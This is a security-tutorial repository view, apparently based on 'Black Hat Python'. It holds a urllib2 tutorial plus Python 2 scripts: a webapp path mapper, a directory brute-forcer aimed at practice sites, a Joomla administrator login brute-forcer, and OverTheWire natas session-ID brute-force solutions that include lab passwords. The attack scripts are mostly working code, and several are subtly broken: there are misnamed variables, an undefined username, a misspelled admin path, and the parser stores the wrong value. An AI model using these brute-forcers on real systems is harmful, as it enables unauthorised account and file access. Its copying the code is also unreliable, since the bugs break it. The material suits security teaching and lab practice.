The easiest way to start is by taking a look at the **urlopen** method, which returns an object similar to a **file** in Python (plus three more methods: **geturl**, for the URL of the resource; **info**, for meta-information; and **getcode**, for HTTP status code).
### A Simple GET
Let's see how a simple [GET](http://www.w3schools.com/tags/ref_httpmethods.asp) request works. This is done directly with [urlopen](https://docs.python.org/2/library/urllib2.html#urllib2.urlopen):
```python
>>> import urllib2
>>> msg = urllib2.urlopen('http://www.google.com')
>>> print msg.read(100)
<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including (...)
```
Notice that, differently from modules such as [scapy](http://https://singularity-sh.vercel.app/black-hat-python-infinite-possibilities-with-the-scapy-module.html) or [socket](http://https://singularity-sh.vercel.app/black-hat-python-the-socket-module.html), we *need to specify the protocol* in the URL (HTTP).
Now, let's be fancy and customize the output:
```python
import urllib2
response = urllib2.urlopen('http://localhost:8080/')
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print data
```
Which leads to something like this:
```sh
RESPONSE: <addinfourl at 140210027950304 whose fp = <socket._fileobject object at 0x7f8530eec350>>
URL : http://www.google.com
DATE : Tue, 23 Dec 2014 15:04:32 GMT
HEADERS :
Date: Tue, 23 Dec 2014 15:04:32 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: PREF=ID=365306c56a0ffee1:FF=0:TM=1419951872:LM=1419951872:S=lyvP_3cexMCllrVl; expires=Thu, 22-Dec-2016 15:04:32 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=fkMfihQT2bLXyqQ8PIge1TwighxcsI4XVUWQl-7KoqW5i3T-jrzUqrC_lrtO7zd0vph3AzSMxwz2LkdWFN479RREL94s0hqRq3kOroGsUO_tFzBhN1oR9bDRMnW3hqOx; expires=Wed, 01-Jul-2015 15:04:32 GMT; path=/; domain=.google.com; HttpOnly
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.02
Connection: close
LENGTH : 17393
DATA :
<!doctype html>(...)
```
### A simple POST
[POST](http://www.w3schools.com/tags/ref_httpmethods.asp) requests send data to a URL ([often refering](https://docs.python.org/2/howto/urllib2.html#data) to [CGI](http://en.wikipedia.org/wiki/Common_Gateway_Interface) scripts or forms in a web applications).
POST requests, differently from GET requests, usually have side-effects such as changing the state of the system. But data can also be passed in an HTTP GET reqest by encoding it in the URL.
In the case of a HTTML form, the data needs to be encoded and this encoding is made with [urllib](https://docs.python.org/2/library/urllib.html)'s method **urlencode** (a method used for the generation
of GET query strings):
```python
import urllib
import urllib2
data = { 'q':'query string', 'foo':'bar' }
encoded_data = urllib.urlencode(data)
url = 'http://localhost:8080/?' + encoded_data
response = urllib2.urlopen(url)
print response.read()
```
In reality, when working with **urllib2**, a more efficient way to customize the **urlopen** method is by passing a **Request object** as the data argument:
```python
data = { 'q':'query string', 'foo':'bar' }
encoded_data = urllib.urlencode(data)
req = urllib2.Request(url, encoded_data)
response = urllib2.urlopen(req)
print response.read()
```
That's one of the differences between **urllib2** and **urllib**: the former can accept a **Request object** to set the headers for a URL request, while the last accepts only a URL.
### Headers
As we have learned above, we can create a GET request using not only strings but also the [Request](https://docs.python.org/2/library/urllib2.html#urllib2.Request) class. This allows us, for example, to define custom headers.
To craft our own header we create a headers dictionary, with the header key and the custom value. Then we create a Request object to the **urlopen** function call.
For example, let's see how this works for the **User-Agent** header (which is the way the browser identifies itself) :
```python
>>> headers = {}
>>> headers['User-Agent'] = 'Googlebot'
>>> request = urllib2.Request(url, headers=headers)
>>> response = urllib2.urlopen(request)
>>> print "The Headers are: ", response.info()
The Headers are: Date: Tue, 23 Dec 2014 15:27:01 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8929a796c6fba710:FF=0:TM=1419953221:LM=1419953221:S=oEh5NKUEIEBinpwX; expires=Thu, 22-Dec-2016 15:27:01 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=QhRTCRsa254cvvos3EXz8PkKnjQ6qKblw4qegtPfe1WNagQ2p0GlD1io9viogAGbFm7RVDRAieauowuaNEJS3aySZMnogy9oSvwkODi3uV3NeiHwZG_neZlu2SkO9MWX; expires=Wed, 01-Jul-2015 15:27:01 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=0.02
Connection: close
>>> print "The Date is: ", response.info()['date']
The Date is: Tue, 23 Dec 2014 15:27:01 GMT
>>> print "The Server is: ", response.info()['server']
The Server is: gws
>>> response.close()
```
We could also add headers with the **add_headers** method:
```
>>> request = urllib2.Request('http://www.google.com/')
>>> request.add_header('Referer', 'http://www.python.org/')
>>> request.add_header('User-agent', 'Mozilla/5.0')
>>> response = urllib2.urlopen(request)
```
### HTTP Authentication
When authentication is required, the server sends a header (and the **401 error code**) requesting this procedure. The response also specifies the **authentication scheme** and a **realm**. Something like this:
```
WWW-Authenticate: SCHEME realm="REALM".
```
The client then retries the request with the name and password for the realm, included as a header in the request. The steps for this process are the following:
1) create a password manager,
```
passwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
```
2) add the username and password,
```
top_url = "http://example.com/"
passwd_mgr.add_password(None, top_url, username, password)
```
3) create an auth handler,
```
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
```
4) create an *opener* (a OpenerDirector instance),
```
opener = urllib2.build_opener(handler)
```
5) use the opener to fetch a URL,
```
opener.open(a_url)
```
6) install the opener,
```
urllib2.install_opener(opener)
```
7) finally, open the page (where authentication is now handled automatically):
```
pagehandle = urllib2.urlopen(top_url)
```
### Error Handling
**urllib2** has also methods for handling URL errors:
```python
>>> request = urllib2.Request('http://www.false_server.com')
>>> try:
urllib2.urlopen(request)
>>> except urllib2.URLError, e:
print e.reason
(4, 'getaddrinfo failed')
```
Every HTTP response from the server contains a numeric [status code](http://en.wikipedia.org/wiki/List_of_HTTP_status_codes). The default handlers take care some of these responses and for the others, **urlopen** raises an **HTTPError** (which is a subclass of **URLError**).
### Other Available Methods
Other available methods in the **urllib2** library:
* **install_opener** and **build_opener**: install and return an OpenDirector instance.
* ** URLError** and **HTTPError**: raises exceptions for problems, handles exotic HTTP errors, and processes [HTTP error responses](https://docs.python.org/2/howto/urllib2.html#error-codes), respectively.
* **HTTPCookieProcessor**: handles HTTP cookies.
* **HTTPProxyHandler**: sends requests to a proxy.
* **AbstractBasicAuthHandler**, **HTTPBasicAuthHandler**, **ProxyBasicAuthHandler**, **HTTPDigestAuthHandler**, **AbstractDigestAuthHandler**, **ProxyDigestAuthHandler**: handle authentications.
* **HTTPPasswordMgr** and **HTTPPasswordMgrWithDefaultRealm**: keep a database of realm, URL, user and passwords mappings.
* **HTTPHandler**, **HTTPSHandler**, **FileHandler**, **FTPHandler**, **UnknownHandler**: handle sources.
Available methods for the **Request** objects:
* **add_data**, **has_data**, and **get_data**: deal with the Request data.
* **add_header**, **add_unredirected_header**, **has_header**, **get_header**, **header_items**: deal with the header data.
* **get_full_url**, **get_type**, **get_host**, **get_selector**, **set_proxy**, **get_origin_req_host**: deal with the URL data.
And let's not forget about **urllib**'s [urlparse](http://pymotw.com/2/urlparse/index.html#module-urlparse), which provides functions to analyze URL strings. **urlparse** breaks URL strings up in several optional components: **scheme** (example: http), **location** (example: www.python.org:80), **path** (example: index.html), **query** and **fragment**.
Other common functions are **urljoin** and **urlsplit**.
---
## <a name="map"></a>Mapping Webapps from their Installation Packages
[Content management systems](http://en.wikipedia.org/wiki/Content_management_system) are platforms to make it easy to start blogs or simple websites. They are common in shared host environments. However, when all of the security procedures are not followed, they can be a easy target for attackers to gain access to the server.
In this session we are going to build a scanner that searches for all files that are reachable on the remote target, following the structure of the downloaded webapp. This is based in one of the examples of [Black Hat Python](http://www.nostarch.com/blackhatpython).
This type of scanner can show installation files, directories that are not processed by [.htaccess](http://en.wikipedia.org/wiki/Htaccess), and other files that can be useful for an attack.
### Crafting the Scanner
In our scanner script, we use Python's [Queue](https://docs.python.org/2/library/queue.html) objects to build a large stack of items and multiple threads picking items for processing. This will make the scanner run very quickly. The steps are the following:
1) We define the target URL (in this case we are borrowing the example from the book), the number of threads, the local directory where we downloaded and extracted the webapp, and a filter with the file extensions we are not interested on:
```python
import urllib2
import Queue
import os
import threading
THREADS = 10
TARGET = 'http://www.blackhatpython.com'
DIRECTORY = '/home/User/Desktop/wordpress'
FILTERS = ['.jpg', '.css', '.gif', '.png']
```
2) We define a function with a loop that keeps executing until the queue with the paths is empty. On each iteration we get one of these paths and add it to the target URL to see whether it exists (outputting the HTTP status code):
```python
def test_remote():
while not web_paths.empty():
path = web_paths.get()
url = '%s%s' % (TARGET, path)
request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
print '[%d] => %s' % (response.code, path)
response.close()
except urllib2.HTTPError as error:
fail_count += 1
print "Failed" + str(error.code)
```
3) The main loop first creates the queue for paths and then use the **os.walk** method to map all the files and directories in the local version of the webapp, adding the names to the queue (after being filtered by our custom extension list):
```python
if __name__ == '__main__':
os.chdir(DIRECTORY)
web_paths = Queue.Queue()
for r, d, f in os.walk('.'):
for files in f:
remote_path = '%s/%s' %(r, files)
if remote_path[0] == '.':
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in FILTERS:
web_paths.put(remote_path)
```
4) Finally, we create the threads that will be sent to our function **test_remote**. The loop is kept until the path queue is empty:
```python
for i in range(THREADS):
print 'Spawning thread number: ' + str(i+1)
t = threading.Thread(target=test_remote)
t.start()
```
### Testing the Scanner
Now we are ready to test our scanner. We download and test three webapps: [WordPress](https://en-ca.wordpress.org/download/), [Drupal](https://www.drupal.org/project/download), and [Joomla 3.1.1](http://www.joomla.org/announcements/release-news/5499-joomla-3-1-1-stable-released.html).
Running first for Joomla gives the following results:
```sh
$ python mapping_web_app_install.py
Spawning thread number: 1
Spawning thread number: 2
Spawning thread number: 3
Spawning thread number: 4
Spawning thread number: 5
Spawning thread number: 6
Spawning thread number: 7
Spawning thread number: 8
Spawning thread number: 9
Spawning thread number: 10
[200] => /web.config.txt
[200] => /modules/mod_whosonline/helper.php
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /modules/mod_whosonline/mod_whosonline.xml
[200] => /joomla.xml
[200] => /robots.txt.dist
(...)
```
Running for Wordpress:
```sh
(...)
[200] => /wp-links-opml.php
[200] => /index.php
[200] => /wp-config-sample.php
[200] => /wp-load.php
[200] => /license.txt
[200] => /wp-mail.php
[200] => /xmlrpc.php
[200] => /wp-trackback.php
[200] => /wp-cron.php
[200] => /wp-admin/custom-background.php
[200] => /wp-settings.php
[200] => /wp-activate.php
(...)
```
Finally, running for Drupal, we only get five files:
```sh
(...)
[200] => /download.install
[200] => /LICENSE.txt
[200] => /README.txt
[200] => /download.module
[200] => /download.info
```
In all of these results we are able to find some nice results including XML and txt files. This recon can be the start of an attack. Really cool.
-----
## <a name="brute1"></a>Brute-Forcing the Contents of Webapps
In general we are not aware about the structure of files that are accessible in a web server (we don't have the webapp available like in the previous example). Usually we can deploy a spider, like in the [Burp suite](http://portswigger.net/burp/), to crawl the target and find them. However this might not be able to find sensitive files such as, for example, development/configuration files and debugging scripts.
The best way to find sensitive files is to brute-force common filenames and directories. How do we do this?
It turns out that the task is really easy when we already have word lists for directory and files. These lists can be downloaded from sources such as the [DirBurster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) project or [SVNDigger](https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/).
Since scanning third party websites is not legal, we are going to use *play* websites, which are available for testing. Some examples (from [here](http://blog.taddong.com/2011/10/hacking-vulnerable-web-applications.html)):
* [testphp.vulnweb.com](http://testphp.vulnweb.com)
* [testasp.vulnweb.com](http://testasp.vulnweb.com)
* [testaspnet.vulnweb.com](http://testaspnet.vulnweb.com)
* [testphp.vulnweb.com](http://testphp.vulnweb.com)
* [crackme.cenzic.com](http://crackme.cenzic.com)
* [google-gruyere.appspot.com/start](http://google-gruyere.appspot.com/start)
* [www.hacking-lab.com/events/registerform.html](https://www.hacking-lab.com/events/registerform.html?eventid=245)
* [hack.me](https://hack.me)
* [www.hackthissite.org](http://www.hackthissite.org)
* [zero.webappsecurity.com](http://zero.webappsecurity.com)
* [demo.testfire.net](http://demo.testfire.net)
* [www.webscantest.com](http://www.webscantest.com)
* [hackademic1.teilar.gr](hackademic1.teilar.gr)
* [pentesteracademylab.appspot.com](http://pentesteracademylab.appspot.com)
### Writing the Script
In our script we accept word lists for common names of files and directories and use them to attempt to discover reachable paths on the server.
In the same way as before, we can achieve a reasonable speed by creating pool of threads to discover the contents.
The steps of our script are:
1) We define the target, the number of threads, the path for the wordlist (which I made available [here](https://github.com/go-outside-labs/My-Gray-Hacker-Resources/tree/master/Other_Hackings/useful_lists/files_and_dir_lists)), a rogue User-Agent, and the filter list of extensions that we want to look at:
```python
import urllib2
import threading
import Queue
import urllib
THREADS = 10
TARGETS = 'http://testphp.vulnweb.com'
WORDLIST_FILE = '../files_and_dir_lists/SVNDigger/all.txt'
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64l rv:19.0) Gecko/20100101 Firefox/19.0'
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
```
2) We create a function that read our word list, and then add each of this words into a queue for the words, returning this queue:
```python
def build_wordlist(WORDLIST_FILE):
f = open(WORDLIST_FILE, 'rb')
raw_words = f.readlines()
f.close()
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
words.put(word)
return words
```
3) We create a function that loops over the size of the queue, checking whether it's a directory or a file (using the extension list), and then brute-forcing the target URL for each of these words:
```python
def dir_bruter(word_queue, TARGET, EXTENSIONS=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
if '.' not in attempt:
attempt_list.append('/%s/' %attempt)
else:
attempt_list.append('/%s' %attempt)
if EXTENSIONS:
for extension in EXTENSIONS:
attempt_list.append('/%s%s' %(attempt, extension))
for brute in attempt_list:
url = '%s%s' %(TARGET, urllib.quote(brute))
try:
headers = {}
headers['User-Agent'] = USER_AGENT
r = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(r)
if len(response.read()):
print '[%d] => %s' %(response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print '[! %d] => %s' %(e.code, url)
pass
```
4) In the main loop, we build the word list and then we spawn the tread for our **dir_bruter** function:
```python
if __name__ == '__main__':
word_queue = build_wordlist(WORDLIST_FILE)
for i in range(THREADS):
print 'Thread ' + str(i)
t = threading.Thread(target=dir_bruter, args=(word_queue, target))
t.start()
```
### Running the Script
Running this against one of the web application targets will print something like this:
```sh
$ python brute_forcing_locations.py
[200] => http://testphp.vulnweb.com/CVS
[200] => http://testphp.vulnweb.com/admin
[200] => http://testphp.vulnweb.com/script
[200] => http://testphp.vulnweb.com/images
[200] => http://testphp.vulnweb.com/pictures
[200] => http://testphp.vulnweb.com/cart.php
[200] => http://testphp.vulnweb.com/userinfo.php
!!! 403 => http://testphp.vulnweb.com/cgi-bin/
(...)
```
Pretty neat!
-----
## Further References:
- [Form Contents](http://www.w3.org/TR/REC-html40/interact/forms.html#h-17.13.4)
- [A robot.txt parser](http://pymotw.com/2/robotparser/index.html#module-robotparser)
- [stackoverflow](http://stackoverflow.com/questions/tagged/urllib2)
- [Black Hat Python](http://www.nostarch.com/blackhatpython).

View file

@ -0,0 +1,147 @@
#!/usr/bin/env python
__author__ = "bt3"
"""
Now we are going to learn how to brute force a web server.
Most web system have brute-force protection these days, such as
captcha, math equations or a login token that has to be submitted
with request.
In this script we will brute force Joomla, whih lack account lockouts
or strong captchas by default. To brute force it, we need to retrieve
the login token from the login before submitting the password attempt
and ensure that we accept cookies in the session.
1) Install Joomla: https://docs.joomla.org/J3.x:Installing_Joomla
2) Fire ```target/administrator''' and find PHP elements
We see that the form gets submitted to the ```/administrator/index.php```
path as an HTTP POST. You also see that there is a name attribute set to a
long, randomized string. This srting is checked against current user
session, stored in a cookie that is passed in the session:
1. Retriever the login page and accept all cookies that are returned.
2. Parse out all of the form elements from HTML.
3. Set the username/passowrd to a guess from dicitonary
(https://code.google.com/p/grimwepa/downloads/detail?name=cain.txt)
4. Send an HTTP POST to the login processing script including all HTML form fields and our stored cookies.
5. Test to see if we have sucessfully logged into the web app.
"""
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
from brute_forcing_locations import build_wordlist
THREAD = 10
USERNAME = 'admin'
WORDLIST = '../files_and_dir_lists/passwords/cain.txt'
RESUME = None
# where the script donwload and parse HTML
TARGET_URL = 'http://localhost:80/admininstrator/index.php'
# where to submit the brute-force
TARGET_POST = 'http://localhost:80/admininstrator/index.php'
USERNAME_FIELD = 'username'
PASSWORD_FIELD = 'passwd'
# check for after each brute-forcing attempting to determine sucess
SUCESS_CHECK = 'Administration - Control Panel'
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print 'Finished setting up for: ' + username
def run_bruteforce(self):
for i in range(THREAD):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
# after we grab our password attempt, we set the cookie jar,
# and this calss will store cookies in the cookies file
jar = cookielib.FileCookieJar('cookies')
# initialize the urllib2 opener
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(TARGET_URL)
page = response.read()
print "Trying: %s : %s (%d left)" %(self.username, brute, \
self.passwd_q.qsize())
# parse out the hidden fields
# make the initial request to retrieve the login form
# when we have the raw html we pass it off our html parser
# and call its feed method, which returns a dictionary of all
# the retrieved form elements
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
# add our username and password fields
post_tags[USERNAME_FIELD] = self.username
post_tags[PASSWORD_FIELD] = brute
# URL encode the POST variables and pass it to the
# HTTP request
login_data = urllib.urlencode(post_tags)
login_response = opener.open(TARGET_POST, login_data)
login_result = login_response.read()
if SUCESS_CHECK in login_result:
self.found = True
print '[*] Bruteforce successful.'
print '[*] Username: ' + username
print '[*] Password: ' + brute
print '[*] Waiting for the other threads to exit...'
# core of our HTML processing: the HTML parsing class to use
# against the target.
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
# creaaate a dictionary for results
self.tag_results = {}
# called whenever a tag is found
def handle_starttag(self, tag, attrs):
# we are look for input tags
if tag == 'input':
tag_name = None
tag_value = None
for name, value in attrs:
if name == 'name':
tag_name = value
if name == 'value':
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
if __name__ == '__main__':
words = build_wordlist(WORDLIST)
brute_obj = Bruter(USERNAME, words)
brute_obj.run_bruteforce()

View file

@ -0,0 +1,106 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import threading
import Queue
import urllib
THREADS = 10
TARGETS = [ 'http://testphp.vulnweb.com', \
'http://testasp.vulnweb.com', \
'http://testaspnet.vulnweb.com',\
'http://testphp.vulnweb.com',\
'http://crackme.cenzic.com',\
'http://google-gruyere.appspot.com/start',\
'https://www.hacking-lab.com/events/registerform.html?eventid=245',\
'https://hack.me',\
'http://www.hackthissite.org',\
'http://zero.webappsecurity.com',\
'http://demo.testfire.net',\
'http://www.webscantest.com',\
'http://hackademic1.teilar.gr',\
'http://pentesteracademylab.appspot.com']
WORDLIST_FILE = '../files_and_dir_lists/SVNDigger/all.txt'
RESUME = None
USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64l rv:19.0) Gecko/20100101 Firefox/19.0'
EXTENSIONS = ['.php', '.bak', '.orig', '.inc']
# read the wordlist and iteract over each line
def build_wordlist(WORDLIST_FILE):
f = open(WORDLIST_FILE, 'rb')
raw_words = f.readlines()
f.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
# functionality that allows to resume a brute-forcing
# session if the network connectivity is interrupted or down
if RESUME is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print 'Resuming wordlist from: ' + resume
else:
words.put(word)
# when the entire file has been parsed, we return a Queue full of
# words to use on the brute-forcing function
return words
# accepts a Queue object that is populated with words to use
# for brute-forcing and an optional list of files extensions to test
def dir_bruter(word_queue, TARGET, EXTENSIONS=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check to see if there is a file extension,
# if not, its a directory
# see if there is a file extension in the current word
if '.' not in attempt:
attempt_list.append('/%s/' %attempt)
else:
attempt_list.append('/%s' %attempt)
# if we want to bruteforce extensions, apply to the current word
if EXTENSIONS:
for extension in EXTENSIONS:
attempt_list.append('/%s%s' %(attempt, extension))
# iterate over our lists of attempts
for brute in attempt_list:
url = '%s%s' %(TARGET, urllib.quote(brute))
try:
headers = {}
# set to something innocuous
headers['User-Agent'] = USER_AGENT
r = urllib2.Request(url, headers = headers)
# test the remote web server
response = urllib2.urlopen(r)
if len(response.read()):
print '[%d] => %s' %(response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print '[! %d] => %s' %(e.code, url)
pass
if __name__ == '__main__':
# get the list, and spin threads to brute force it
word_queue = build_wordlist(WORDLIST_FILE)
for target in TARGETS:
#print "Attacking " + target + '...'
for i in range(THREADS):
print 'Thread ' + str(i)
t = threading.Thread(target=dir_bruter, args=(word_queue, target))
t.start()

View file

@ -0,0 +1,68 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import Queue
import os
import threading
THREADS = 10
TARGET = 'http://www.blackhatpython.com'
# local directory into which we have downloaded and extracted the web app
#DIRECTORY = '/home/User/Desktop/Joomla'
#DIRECTORY = '/home/User/Desktop/wordpress'
DIRECTORY = '/home/User/Desktop/drupal'
# list of file extensions to not fingerprinting
FILTERS = ['.jpg', '.gif', '.png', '.css']
# each operation in the loop will keep executing until the web_paths
# Queue is empty. on each iteration we grab a path from the queue, add it
# to the target website's base path and then attempt to retrieve it
def test_remote():
while not web_paths.empty():
path = web_paths.get()
url = '%s%s' % (TARGET, path)
request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
# if we are successfully retrieving the file, the output HTTP status code
# and the full path for the file is printed
print '[%d] => %s' % (response.code, path)
response.close()
# if the file is not found or protected by .htaccess, error
except urllib2.HTTPError as error:
fail_count += 1
print "Failed" + str(error.code)
if __name__ == '__main__':
os.chdir(DIRECTORY)
# queue object where we store files to locate in the remote server
web_paths = Queue.Queue()
# os.walk function walks through all the files and directories in the local
# web application directory. this builds the full path to the target files
# and test them against filter list to make sure we are looking for the
# files types we want. For each valid file we find, we add it to our
# web_paths Queue.
for r, d, f in os.walk('.'):
for files in f:
remote_path = '%s/%s' %(r, files)
if remote_path[0] == '.':
remote_path = remote_path[1:]
if os.path.splitext(files)[1] not in FILTERS:
web_paths.put(remote_path)
# create a number of threads that will be called the test_remote function
# it operates in a loop that keep executing untul the web_paths queue is
# empty.
for i in range(THREADS):
print 'Spawning thread: ' + str(i)
t = threading.Thread(target=test_remote)
t.start()

View file

@ -0,0 +1,76 @@
#!/usr/bin/env python
__author__ = "bt3"
import urllib2
import urllib
def post_general(url):
values = {'name' : 'Dana Scullt',
'location' : 'Virginia',
'language' : 'Python' }
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
def get_general(url):
msg = urllib2.urlopen(url)
print msg.read()
def get_fancy(url):
response = urllib2.urlopen(url)
print 'RESPONSE:', response
print 'URL :', response.geturl()
headers = response.info()
print 'DATE :', headers['date']
print 'HEADERS :'
print '---------'
print headers
data = response.read()
print 'LENGTH :', len(data)
print 'DATA :'
print '---------'
print data
def get_user_agent(url):
headers = {}
headers['User-Agent'] = 'Googlebot'
request = urllib2.Request(url, headers=headers)
request = urllib2.Request('http://www.google.com/')
request.add_header('Referer', 'http://www.python.org/')
request.add_header('User-agent', 'Mozilla/5.0')
response = urllib2.urlopen(request)
#print response.read()
print "The Headers are: ", response.info()
print "The Date is: ", response.info()['date']
print "The Server is: ", response.info()['server']
response.close()
def error(url):
request = urllib2.Request('http://aaaaaa.com')
try:
urllib2.urlopen(request)
except urllib2.URLError, e:
print e.reason
if __name__ == '__main__':
HOST = 'http://www.google.com'
#get_user_agent(HOST)
#get_fancy(HOST)
#post_general(HOST)
#get_user_agent(HOST)
error(HOST)

View file

@ -0,0 +1,33 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + str(i)}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)

View file

@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
for i in range(MAXID):
HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
print(i)
if "You are an admin" in r.text:
print(r.text)
print(r.url)
if __name__ == '__main__':
AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(AUTH, URL, PAYLOAD, MAXID)